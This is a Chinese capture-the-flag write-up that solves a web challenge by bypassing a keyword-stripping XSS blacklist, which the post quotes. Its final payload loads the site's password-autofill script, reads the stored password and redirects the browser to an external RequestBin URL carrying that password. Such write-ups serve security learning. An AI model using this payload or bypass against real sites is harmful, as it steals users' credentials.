登录页面f12可以看到<script src="./js/login.js"></script>,访问可以看到部分源码:

if (document.cookie && document.cookie != '') {
  var cookies = document.cookie.split('; ');
  var cookie = {};
  for (var i = 0; i < cookies.length; i++) {
    var arr = cookies[i].split('=');
    var key = arr[0];
    cookie[key] = arr[1];
  }
  if(typeof(cookie['user']) != "undefined" && typeof(cookie['psw']) != "undefined"){
    document.getElementsByName("username")[0].value = cookie['user'];
    document.getElementsByName("password")[0].value = cookie['psw'];
  }
}

该代码表示其将用户名和密码都填入了表单(记住密码功能).之后随意注册一个用户,登录.进去后告诉我们这题不是注入.点击上方的feedback,发现有个输入框,f12发现注释的地方有源码:

if(is_array($feedback)){
        echo "<script>alert('反馈不合法');</script>";
  return false;
}
$blacklist = ['_','\'','&','\\','#','%','input','script','iframe','host','onload','onerror','srcdoc','location','svg','form','img','src','getElement','document','cookie'];
foreach ($blacklist as $val) {
  while(true){
                if(stripos($feedback,$val) !== false){
                    $feedback = str_ireplace($val,"",$feedback);
    }
                else{
                    break;
          }
        }
}

根据blacklist的内容和输入框可以猜测是xss.代码中对blacklist的过滤只是将其替换为空,很好绕过,例如input写成incookieput即可.(插入cookie是因为cookie是blacklist中的最后一个词,匹配到cookie后循环就结束了.)

看了大佬wp说本题有csp,无法引入外部js,所以从题目本身的js下手.login.js有记住密码功能,于是构造payload写进feedback的输入框中提交,利用buu的RequestBin来接收反馈.

payload:

<inpcookieut type="text" name="username"></inpcookieut>
<inpcookieut type="text" name="password"></inpcookieut>
<scricookiept scookierc="./js/login.js"></scricookiept>
<scricookiept>
  var passwd = documcookieent.getElemcookieentsByName("password")[0].value;
  documcookieent.locacookietion="http://http.requestbin.buuoj.cn/s4dpjps4/?a="+passwd;
</scricookiept>

提交成功后稍等一段时间,在requestbin就能看到flag了.

Categories:

Tags:

No responses yet

发表评论

电子邮件地址不会被公开。 必填项已用*标注

闽ICP备19027300号